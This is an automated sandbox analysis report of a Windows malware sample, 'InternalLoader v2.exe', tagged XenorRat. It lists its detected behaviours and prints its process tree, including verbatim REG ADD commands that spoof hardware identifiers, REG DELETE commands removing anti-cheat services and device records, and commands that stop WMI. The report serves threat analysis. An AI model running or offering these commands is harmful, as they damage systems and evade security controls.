Analysis Overview
SHA256
66f635bf805463c4a83b969ac8d4cc563b2feadaea0460dc22c5f53be72a9223
Threat Level: Known bad
The file InternalLoader v2.exe was found to be: Known bad.
Malicious Activity Summary
XenorRat
Deletes shadow copies
Sets service image path in registry
Downloads MZ/PE file
Stops running service(s)
Drops file in Drivers directory
Checks computer location settings
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Enumerates connected drives
Drops file in System32 directory
Launches sc.exe
Enumerates physical storage devices
Unsigned PE
Suspicious behavior: EnumeratesProcesses
Checks processor information in registry
Enumerates system info in registry
Runs net.exe
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Kills process with taskkill
Uses Volume Shadow Copy service COM API
Modifies registry key
Gathers network information
Interacts with shadow copies
Suspicious behavior: LoadsDriver
Analysis: static1
Detonation Overview
Reported
2024-05-30 11:22
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-30 11:22
Reported
2024-05-30 11:25
Platform
win10v2004-20240508-en
Max time kernel
127s
Max time network
149s
Signatures
XenorRat
Deletes shadow copies
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\drivers\spotifyHResultInstaller.sys | C:\Users\Admin\AppData\Local\Temp\RarSFX0\InternalLoader2.exe | N/A |
| File created | C:\Windows\System32\drivers\etc\spotifyHResultInstaller.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\InternalLoader2.exe | N/A |
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\dQDbesygfrMwuPmZJIv\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\dQDbesygfrMwuPmZJIv" | C:\Windows\System32\drivers\etc\spotifyHResultInstaller.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\frAQBc8Wsa1xVPfv\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\frAQBc8Wsa1xVPfv" | C:\Users\Default\AppData\Roaming\injector.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\InternalLoader v2.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | C:\Users\Default\AppData\Roaming\injector.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\InternalLoader2.exe | N/A |
| N/A | N/A | C:\Windows\System32\drivers\etc\spotifyHResultInstaller.exe | N/A |
| N/A | N/A | C:\Users\Default\AppData\Roaming\injector.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\F: | C:\Windows\system32\fsutil.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\system32\fsutil.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\fsutil.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\wbem\repository\OBJECTS.DATA | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\wbem\repository\INDEX.BTR | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\wbem\repository | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\wbem\repository\WRITABLE.TST | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\wbem\repository\MAPPING1.MAP | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\wbem\repository\MAPPING2.MAP | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\wbem\repository\MAPPING3.MAP | C:\Windows\system32\svchost.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\reg.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\reg.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 | C:\Windows\system32\reg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier = "2787620314-2172020521-1728624429" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 | C:\Windows\system32\reg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier = "2787620314-2172020521-1728624429" | C:\Windows\system32\reg.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Kills process with taskkill
Modifies registry key
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\drivers\etc\spotifyHResultInstaller.exe | N/A |
| N/A | N/A | C:\Users\Default\AppData\Roaming\injector.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\InternalLoader v2.exe
"C:\Users\Admin\AppData\Local\Temp\InternalLoader v2.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\InternalLoader2.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\InternalLoader2.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\RarSFX0\InternalLoader2.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\RarSFX0\InternalLoader2.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\drivers\etc\spotifyHResultInstaller.exe C:\Windows\System32\drivers\spotifyHResultInstaller.sys
C:\Windows\System32\drivers\etc\spotifyHResultInstaller.exe
C:\Windows\System32\drivers\etc\spotifyHResultInstaller.exe C:\Windows\System32\drivers\spotifyHResultInstaller.sys
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d %Random% /f >nul
C:\Windows\system32\reg.exe
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d 27876 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d %Random% /f >nul
C:\Windows\system32\reg.exe
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d 27876 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {%Random%%Random%-%Random%%Random%-%Random%%Random%} /f >nul
C:\Windows\system32\reg.exe
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {2787620314-2172020521-1728624429} /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d 2787620314-2172020521-1728624429 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {%Random%%Random%-%Random%%Random%-%Random%%Random%} /f >nul
C:\Windows\system32\reg.exe
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {2787620314-2172020521-1728624429} /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {%Random%%Random%-%Random%%Random%-%Random%%Random%} /f >nul
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {2787620314-2172020521-1728624429} /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d 2787620314-2172020521-1728624429 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d 2787620314-2172020521-1728624429 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d 2787620314-2172020521-1728624429 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f >nul
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d 2787620314-2172020521-1728624429 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f >nul
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d 2787620314-2172020521-1728624429 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d 2787620314-2172020521-1728624429 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d 2787620314-2172020521-1728624429 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d 2787620314-2172020521-1728624429 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t REG_SZ /d 2787620314-2172020521-1728624429 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d 2787620314-2172020521-1728624429 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d 2787620314-2172020521-1728624429 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t REG_SZ /d 2787620314-2172020521-1728624429 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d 2787620314-2172020521-1728624429 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {%Random%%Random%-%Random%%Random%-%Random%%Random%} /f >nul
C:\Windows\system32\reg.exe
REG ADD HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {2787620314-2172020521-1728624429} /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f >nul
C:\Windows\system32\reg.exe
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d 2787620314-2172020521-1728624429 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f >nul
C:\Windows\system32\reg.exe
REG ADD HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d 2787620314-2172020521-1728624429 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d%Random%%Random%-%Random%%Random%-%Random%%Random% /f >nul
C:\Windows\system32\reg.exe
REG ADD HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d2787620314-2172020521-1728624429 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d 2787931063-681611817-2760128356 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v ProductId /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f >nul
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v ProductId /t REG_SZ /d 2787931063-681611817-2760128356 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f >nul
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d 2787931063-681611817-2760128356 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLab /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLab /t REG_SZ /d 2787931063-681611817-2760128356 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d 2787931063-681611817-2760128356 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d 2787931063-681611817-2760128356 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t REG_SZ /d 2787931063-681611817-2760128356 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d 2787931063-681611817-2760128356 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d 2787931063-681611817-2760128356 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v RegisteredOwner /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v RegisteredOwner /t REG_SZ /d 2787931063-681611817-2760128356 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v RegisteredOrganization /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v RegisteredOrganization /t REG_SZ /d 2787931063-681611817-2760128356 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t REG_SZ /d 2787931063-681611817-2760128356 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId /t REG_BINARY /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId /t REG_BINARY /d 2787931063-681611817-2760128356 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId4 /t REG_BINARY /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId4 /t REG_BINARY /d 2787931063-681611817-2760128356 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {%Random%%Random%-%Random%%Random%-%Random%%Random%} /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {2787931063-681611817-2760128356} /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {%Random%%Random%-%Random%%Random%-%Random%%Random%} /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {2787931063-681611817-2760128356} /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG DELETE HKLM\SYSTEM\MountedDevices /f
C:\Windows\system32\reg.exe
REG DELETE HKLM\SYSTEM\MountedDevices /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
C:\Windows\system32\reg.exe
REG DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
C:\Windows\system32\reg.exe
REG DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
C:\Windows\system32\reg.exe
REG DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f
C:\Windows\system32\reg.exe
REG DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG DELETE HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
C:\Windows\system32\reg.exe
REG DELETE HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v AcpiData /f
C:\Windows\system32\reg.exe
REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v AcpiData /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v BiosData /f
C:\Windows\system32\reg.exe
REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v BiosData /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v RegistersData /f
C:\Windows\system32\reg.exe
REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v RegistersData /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f
C:\Windows\system32\reg.exe
REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG DELETE HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f
C:\Windows\system32\reg.exe
REG DELETE HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG DELETE HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f
C:\Windows\system32\reg.exe
REG DELETE HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG DELETE HKLM\SYSTEM\ControlSet001\Services\BEService /f
C:\Windows\system32\reg.exe
REG DELETE HKLM\SYSTEM\ControlSet001\Services\BEService /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop winmgmt >nul
C:\Windows\system32\sc.exe
sc stop winmgmt
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc start winmgmt >nul
C:\Windows\system32\sc.exe
sc start winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop winmgmt /y >nul
C:\Windows\system32\net.exe
net stop winmgmt /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop winmgmt /y
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net start winmgmt /y >nul
C:\Windows\system32\net.exe
net start winmgmt /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start winmgmt /y
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\cmd.exe
